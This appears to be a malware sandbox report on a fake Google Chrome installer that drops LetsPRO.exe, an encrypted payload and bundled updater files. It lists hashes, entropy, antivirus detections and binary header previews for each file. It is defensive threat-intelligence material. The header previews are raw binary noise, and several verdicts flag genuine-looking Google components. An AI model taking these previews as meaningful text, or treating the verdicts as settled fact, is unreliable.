                                      Preview:...@IXOS.@.....@.f.X.@.....@.....@.....@.....@.....@......&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}..Google Chrome..sutup-Chrome.13.26.x64.msi.@.....@.....@.....@........&.{924DFDB4-5E1D-409E-8393-FA9658AA79C4}.....@.....@.....@.....@.......@.....@.....@.......@......Google Chrome......Rollback..ck(W.V...d\O:...[1]..RollbackCleanup..ck(W Rd..Y.N.e.N...e.N:. .[.1.].....ProcessComponents..ck(W.f.e.~.N.l.Q..&.{70366BA3-A10F-4C67-AC8A-4DFE5BE2D7FD}&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}.@......&.{DB28640C-691F-42B8-A615-644DCA0203A3}&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}.@......&.{D8A595F1-49AD-4C63-BD58-95E574F97962}&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}.@......&.{AA4F795E-E67B-4915-8003-F1548190EC51}&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}.@......&.{0EE71893-E09E-47F1-B09B-F0F2A40DE943}&.{26E6D275-3FC7-41A2-B8C2-458B639029D2}.@........AI_RollbackTasks2..ck(W.V.n,g0W...{:g.N.v.N.R...R...N.R.T:. .[.1.].L...AI_RollbackTasks2.@.-....h\..MZ......................@..........................

                                      C:\Program Files (x86)\ChromeSetup.exe

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1376816
                                      Entropy (8bit):7.919887049125556
                                      Encrypted:false
                                      SSDEEP:24576:PJvKzcVkyEq9DRho1jFP8ltPP01Ws7+wFPEl9ix4fpUzoQDt+egElxdqFWVCGC:FKzcCyEq9DRho/ctH01Ws74rA4RUBDHo
                                      MD5:8884A9547AA410B697EFAD097F2B0013
                                      SHA1:F3E7B8A25DF24532F48DAE750388E1749169B620
                                      SHA-256:24E46969CEA3B387E899D5DA33820B988A9944100E47ABA3D1960C4080F28B9B
                                      SHA-512:E03EB2EB3F8414B2C9AA9431B63082FB195EA499DC7C1EA9E67E649C81B5C13D922FDA30C5B62CA15A9BCCBC6D7F6EFA4A92EF604216E80EF3EE14D10E38B1C4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../..VNe.VNe.VNe.<f.\Ne.<`..Ne.<a.BNe..$a.GNe..$f.DNe..$`.{Ne."%l.PNe.<d.[Ne.VNd. Ne."%..WNe.VN..aNe."%g.WNe.RichVNe.........PE..L......e.........."......x...:......tS............@.................................bG....@.....................................x.... ..................0L..............T...............................@............................................text....v.......x.................. ..`.rdata..Fo.......p...|..............@..@.data...............................@....rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):247272
                                      Entropy (8bit):6.894584449013581
                                      Encrypted:false
                                      SSDEEP:6144:+Zzvhs2Z4n1E7g34XtVYAOfTdxz44JsQwtUnh2:+J+2Z4nShVY5HU3Uh2
                                      MD5:7BB188DFEE179CBDE884A0E7D127B074
                                      SHA1:AF351D674EC8515B4363B279C5EF803F7A4A3618
                                      SHA-256:7C3308F04DF19ECAA36818C4A49348E1D6921A43DF5C53CB8131CC58E92889ED
                                      SHA-512:45DF588D45CAD6BCE5DFB48626D7505140EC1C1BEECB97E3F9393CB90A144CA09C1A4D4DED75FCE18AC3C7DC6F5CA0B222574222BD746D60CB6068EF910A5C4B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_............................+.............@.......................................@.....................................<.......L................+.......!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...L...........................@..@.reloc...!......."...x..............@..B........................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9844736
                                      Entropy (8bit):7.99998096243402
                                      Encrypted:true
                                      SSDEEP:196608:qRlibNUmuwBTq1rmORsopQx6KUlel00nSzVnTHY8ouGs6HMfk3dW6Mw:Q2NUmJTq4DMelbSFjY8D6HMfymw
                                      MD5:75D0239E2D42FCB09AD6DD6380E58441
                                      SHA1:D146D55D9E3CAC254414C5D3DCCD56E55C62F229
                                      SHA-256:530A033F92543E1FE9061E5043F0EACBEC5A0DB300B862E8470FCD0C36FE07C1
                                      SHA-512:18FE51D9F9DED140E9A12F1C20C8FA4FA049892C480DCF933A29B15F3E3F063BE410245071DA77CAC34626FCBF60FE067F42D39EB4B03CFFD2FB88413314E695
                                      Malicious:false
                                      Preview:...#v.,g.6...9..p9...0...j.....L{....Z"T...X..F.r....p....4jTx..zqw.0,.2/4..:......./9q.c*..2Wu..67...j.b...'.....OA\?j...z..Y..4..aE.n34.)...o..=7.Q.T.F..p...d.......,.......]9.1.d...;..^<G...`..c.V.@.}L......[...D....8.8./+...p.7......9.m..6.*u..+.v....U.4...Z(^.Wk...)n.. .m&|..U...;T=....3d.}....\../i ..m..V.>....!7_+..bC..s.......0.@.....`.l"..a2.a..y$..9..^..+...G.R.|......M..o...M..4......%....04.*....QO...[.v....M#.6e.k.8..d......k`X.t.x.X!..,.j.vq{..1....2....s"=V[... .>.A......56..X...?.....I2y..[..GH=.w.A.....#S.....D..q)...d.Rakb.......K.P...H...9.'....W2...7.'x-.z:...r.7..H..|..e.hy..j.O.3..V.E.R..ew...D.f.R...a......%}..uK"[6..v&A9.I.....Q8`.L......=b.....R._..W.Q.\:K,PGc..{u=..f.(.W..5"........~....?.=..uV...<i@.W0....E;.Y.8f.J..C.%..'...*CDc%....s....8..1..UT3.........[uaj&f.7........G".#).x.u..1.P...).H.......?A^3.D.G...Q...x9Ok.O....$.).l....?...-..../0.`'}.=m...s.....W..v..a(.'..%...o..3....B..^..T...Pi.y..&...#vsu......]f. ..

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):4.658263260341292
                                      Encrypted:false
                                      SSDEEP:96:d6kLgAfFGeOEdsmW2ZL0lpTSupF/ojJnkYY2oS6k9Tvg3uB:ZkA2mBpYpMkd2Ik9Tvgq
                                      MD5:A5FC151170B4BEF53A2918729AA6D3A9
                                      SHA1:5C4AA81EABF2B681D950813EFE91B4959DEF907F
                                      SHA-256:7462F9337A959B4F57B58CB2002016DD1BBDBD6A9B7BA339C933A5B6C1BBC324
                                      SHA-512:48FACE9B188040377787E0FF0E0725FED5CEFEE4AA5CE4B8CA89AF40352FEA559D446941858BB1A3DB6CACF901CBCAE62C8005EE616829974B6A7A9F01B8472B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 17%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'...E.."...'...*.......%...'...&.......%.......&...Rich'...................PE..L....J.f..................................... ....@..........................@..............................................8 ..<.................................................................................... ..8............................text............................... ..`.rdata..r.... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):422040
                                      Entropy (8bit):6.600223717807955
                                      Encrypted:false
                                      SSDEEP:12288:AOb8zxr1aWPaHX7dGP5HrhUgiW6QR7t5qv3Ooc8UHkC2ebe:AOb8Fpa6aHX7dGP5Ov3Ooc8UHkC2ei
                                      MD5:ED40615AA67499E2D2DA8389BA9B331A
                                      SHA1:09780D2C9D75878F7A9BB94599F3DC9386CF3789
                                      SHA-256:CD28DAEDA3C8731030E2077E6ECCBB609E2098919B05FF310BEF8DCE1DCE2D8D
                                      SHA-512:47D94C5F4829A0F901B57084C22B24ADEFB4AEC2F7B8DF9EA838E485DBC607AA837ED6D3C7186159499C44A3FF488FB04F770C624649A406854D82CD3BAF72EE
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: VisualCppRedist_AIO_x86_x64.exe, Detection: malicious, Browse
                                      • Filename: RDWorksV8Setup8.01.55-20210605.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..d...d...d.......d.......d...d..Cd..K*...d.......d.......d.......d.......d.......d.......d.......d..Rich.d..........................PE..L....{.X.........."!.................<.............x................................1Q....@.................................<...<.... ...............V.......0..D;..p................................/..@...............p............................text...u........................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):774808
                                      Entropy (8bit):6.905201555700815
                                      Encrypted:false
                                      SSDEEP:12288:amCy3y9cSWI5vMBEWL3XU8+n6ODOlMFgvXmteA5RLTDz7sHA9p++/pj:amCy3acqvM6WL3XU8+n6ODxgf4eUH7Tt
                                      MD5:EF3E115C225588A680ACF365158B2F4A
                                      SHA1:ECDA6D3B4642D2451817833B39248778E9C2CBB0
                                      SHA-256:25D1CC5BE93C7A0B58855AD1F4C9DF3CFB9EC87E5DC13DB85B147B1951AC6FA8
                                      SHA-512:D51F51336B7A34EB6C8F429597C3D685EB53853EE5E9D4857C40FC7BE6956F1B8363D8D34BEBAD15CCCEAE45A6EB69F105F2DF6A672F15FB0E6F8D0BB1AFB91A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: VisualCppRedist_AIO_x86_x64.exe, Detection: malicious, Browse
                                      • Filename: RDWorksV8Setup8.01.55-20210605.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L....{.X.........."!................,........0.....x................................tW....@.........................XI......d...(...............................$L..."..8............................E..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):301856
                                      Entropy (8bit):6.654439927825066
                                      Encrypted:false
                                      SSDEEP:6144:5habloKMimZI46P5Bzb854fgJs3uVAOs5qiwckGIk0ggwJhi/rQx+D8P:al5MiU50jb854fgfK5qiw8Ik0ggwJhis
                                      MD5:4C3832FBE84B8CE63D8E3AB7D76F9983
                                      SHA1:EEA2D91B7D7D2CDF79BB9F354AF7A33D6014F544
                                      SHA-256:8FE2226E8BEC5A45D4B819359192AB92446B54859BF8877573AB7A3C8B4ADA76
                                      SHA-512:E6E316BF3414FFB2674BF240760B2617CED755B8A34AD4B3213BCCA6EA9A0AA3C2E094319D709A958F603B72197BFA34B100DBE87B618E17601B2E0DAC749F84
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: Chrome-Setup.msi, Detection: malicious, Browse
                                      • Filename: oujFMn0mdW.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L......e.............................s............@.................................J.....@.................................l........P...2...........r.. ).......(......T...........................h...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...(.......*...H..............@..B................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):402208
                                      Entropy (8bit):6.361069039231634
                                      Encrypted:false
                                      SSDEEP:12288:ge4r7rSB+2zUM2WJoROZEUT2N9oqs3Kw8q76uIx+Z:g5razT2N9fgKw76uIxq
                                      MD5:DAE993327723122C9288504A62E9F082
                                      SHA1:153427B6B0A5628360472F9AB0855A8A93855F57
                                      SHA-256:38903DEC79D41ABDA6FB7750B48A31FFCA418B3EAB19395A0A5D75D8A9204EE7
                                      SHA-512:517FC9EAF5BF193E984EEE4B739B62DF280D39CD7B6749BEC61D85087CC36BB942B1EBAED73E4A4A6E9FA3C85A162F7214D41EA25B862A4CF853E1129C10293D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d......e.........."..........R.................@.............................p......].....`..................................................M....... ...2.......,...... )...`..8.... ..T............................ ..................(............................text............................... ..`.rdata.............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc..8....`......................@..B........................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):162080
                                      Entropy (8bit):5.986584434229805
                                      Encrypted:false
                                      SSDEEP:3072:DwzvOYTt5YP/aKavT/DvbEvK9aobNI2B+flkL7OjUuxGftPyhdY55s2ZUuyNFhyV:GtiP/aK2h9H/B+/
                                      MD5:BAF0B64AF9FCEAB44942506F3AF21C87
                                      SHA1:E78FB7C2DB9C1B1F9949F4FCD4B23596C1372E05
                                      SHA-256:581EDECA339BB8C5EBC1D0193AD77F5CAFA329C5A9ADF8F5299B1AFABED6623B
                                      SHA-512:EE590E4D5CCDD1AB6131E19806FFD0C12731DD12CF7BFB562DD8F5896D84A88EB7901C6196C85A0B7D60AEE28F8CFBBA62F8438D501EABD1BB01EC0B4F8D8004
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L......e.................D..........Ru.......`....@.......................................@.................................P...x....... ............P.. )..........p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):108320
                                      Entropy (8bit):6.4795260643674
                                      Encrypted:false
                                      SSDEEP:3072:OMxJ7Rfp8K172YPrN4vzT+PlZpsB+0H+EOZvMs:OMH7cCxPRpsB+s94Ms
                                      MD5:FF2D1B951CAFE2A3B88A168900844303
                                      SHA1:71A367F119E30C346C8B4A028CCFC8A122B0E53E
                                      SHA-256:F8E20A4EFB9BB32AF39E3CBC414412B3B01C0442ABFE214A58BC3ECCFFFD35B7
                                      SHA-512:6A35C8AB850552B64B3FC8853079559A69A302CEA6A8D44DB4BCC71322995E2EB3485B02317B2115D5236BE38A8A090751E55DAD6A59D181B843857DAD7E1690
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L......e..........................................@.................................R.....@..................................5..<....`..p2...........~.. )...........+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):185632
                                      Entropy (8bit):6.208575989324197
                                      Encrypted:false
                                      SSDEEP:3072:9ni3ZsI1rXRAmWt9h8QlLISqG+T1DpV9qEKLmoY46WeJbJ+O3dnD7:9ni3ZsQrBAmWt9h8QlLISZWVJohkn7d
                                      MD5:0FE3644C905D5547B3A855B2DC3DB469
                                      SHA1:80B38B7860A341F049F03BD5A61782FF7468EAC7
                                      SHA-256:7D5C0ED6617DBC1B78D2994A6E5BBDA474B5F4814D4A34D41F844CE9A3A4EB66
                                      SHA-512:E2CF9E61C290599F8F92214FAE67CCE23206A907C0AB27A25BE5D70F05D610A326395900B8ED8ED54F9ECBDDFD1B890F10280D00DBCDAD72E0272D23F0DB1E53
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d......e.........."......R...z.......R.........@.............................0......t.....`..................................................p..x....................... )... .......V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc....... ......................@..B........................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223008
                                      Entropy (8bit):6.650401463042642
                                      Encrypted:false
                                      SSDEEP:6144:Bqml5a6EdkQxiUmRQColKGAOPQK2GwIgfx+qSfF0:gml5a6EdkQgUmR7G9QK3wJx+qSfF0
                                      MD5:021C57C74DE40F7C3B4FCF58A54D3649
                                      SHA1:EF363AB45B6FE3DD5B768655ADC4188AADF6B6FD
                                      SHA-256:04ADF40BA58D0AB892091C188822191F2597BC47DAB8B92423E8FC546DC437EF
                                      SHA-512:77E3BBB08C661285A49A66E8090A54F535727731C44B7253EA09FFE9548BAE9D120EF38A67DFA8A5D8DA170DDE3E9C1928B96C64DFC07B7F67F93B478937C018
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L......e.....................r......G.............@.......................................@..........................................0...2...........>.. )...p... ..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc... ...p..."..................@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):108320
                                      Entropy (8bit):6.479395999944146
                                      Encrypted:false
                                      SSDEEP:3072:vER5AhC48S1m2YPrh4qR8vLZksB+0Hdqxl:vEXAe6QP4ksB+sYL
                                      MD5:B191834EB918C5BCAA46E594561C53C9
                                      SHA1:1EAB0F1C6C4E6E36C454556022E80677F1A8360E
                                      SHA-256:0FA78EEA190E3AE9DDB0E6CD85EB5188947CE0BA748FC6D567ADE48B1FB3AE27
                                      SHA-512:D16BB62290C752866A150E6B52AE9A6478D8901B194A71F5768896E311A6B5750F4D6741501D8D807EE85C09F65EF2468992A384436838B61FAC5F955CDAD696
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L......e..........................................@.......................................@..................................5..<....`..p2...........~.. )...........+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2040096
                                      Entropy (8bit):6.851106187237549
                                      Encrypted:false
                                      SSDEEP:24576:3HhPvGlhhk7g+Kq8RpRBr0saiXFkGB9zkdpglcKQGFRglutbceGlsIVkuV6WlZv4:R+677eRFoqFkak3gllbcvkaT1y3ezvN
                                      MD5:DCE0FD2B11B3E4C79A8F276A1633E9AE
                                      SHA1:568021B117ACE23458F1A86CD195D68DE7164FA9
                                      SHA-256:C917AD2BF8C286AE0B4D3E9203AB3DA641AF4C8D332E507319EE4DF914D6219C
                                      SHA-512:BA89867FD2BEA6166B6E27C2A03A9A4759AEE1AFFE75D592F381D9CB42FACBA1AF1535F009A26F2613338B50DE13B6576AB23C4E24D90827739F1678923FF771
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{k..{k..{k.....zk.....zk.....jk.....k......Zk......lk......:k.....ak.....Pk..{k...i......'j......zk....q.zk..{k..@k......zk..Rich{k..........PE..L...V..e...........!.....8...........f.......P...............................`.......#....@......................... ...X...x.......................... )...@..........T...........................X...@............P...............................text...g6.......8.................. ..`.rdata..6....P.......<..............@..@.data...........`..................@....rsrc..............................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.795449103754647
                                      Encrypted:false
                                      SSDEEP:384:3r1C4k4sI+h2cjIYi6yIDYcAM+o/8E9VF0NyFzgMd:BCZJBMYi6yKYcAMxkEfgM
                                      MD5:46F8834DD275C0C165D4E57E0F074310
                                      SHA1:7ACBFB7E88E9E29E2DC45083F94A95A409F03109
                                      SHA-256:91AC6C9686D339BAA0056B1260F4FD1394CE965B1957AA485E83AE73492F46B5
                                      SHA-512:B615FE41B226273693DA423969A834B72C5148F5438E7A782D39191AD3013E2ABFA10D651FA2DED878ABB118E31831DC7DEC51729B3235CEBB2B5D7F3BA2ADE1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ............................................@.............................I....0..(....@..Pp.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...Pp...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):42272
                                      Entropy (8bit):4.793537445820405
                                      Encrypted:false
                                      SSDEEP:384:MficanBDBGHHIYi6y//dHAM+o/8E9VF0NyRZ6:HcanTgoYi6yNHAMxkEN6
                                      MD5:D1C81B89825DE4391F3039D8F9305097
                                      SHA1:ECFCF4B50DFBB460E1D107F9D21DD60030BF18C3
                                      SHA-256:597FE53D87F8AA43B7E2DEB4A729FC77131E4A2B79DC2686E8B86CC96989428E
                                      SHA-512:A2BE34C226C0A596EFA78240984147196A4DE8C93187AF5835F0CEC90ED89E7DFFD7030CD27E7A1F1BD7F26D99322E785E195F5D41BF22E00C4AF08270699642
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........v......h........ ......................................U.....@.............................I....0..(....@...m...........|.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....m...@...n..................@..@.reloc.. ............z..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.824313728277788
                                      Encrypted:false
                                      SSDEEP:384:0/dAtck8aGIZBOc8wIYi6yejAM+o/8E9VF0NykP:01Al7D8ZYi6yoAMxkE
                                      MD5:0D7125B1BDA74781D8F1536E43EB0940
                                      SHA1:39818CACCE52FF2EDFB2A065BEB376D43FDB0A93
                                      SHA-256:00DFE30F3E747B5788F7AE89B390E63760561A411B7E39257376CD13700A1E0B
                                      SHA-512:C34D7405ACCEB7186CF63E75083981B9230D2755E207FDFD1DBCE7D59A96F30EC04C28C12DBE0ED96FB595C63DEC8819C08D406840787D9B9797568FBF50DEC2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................D.....@.............................I....0..(....@..Py.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...Py...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.881792695700134
                                      Encrypted:false
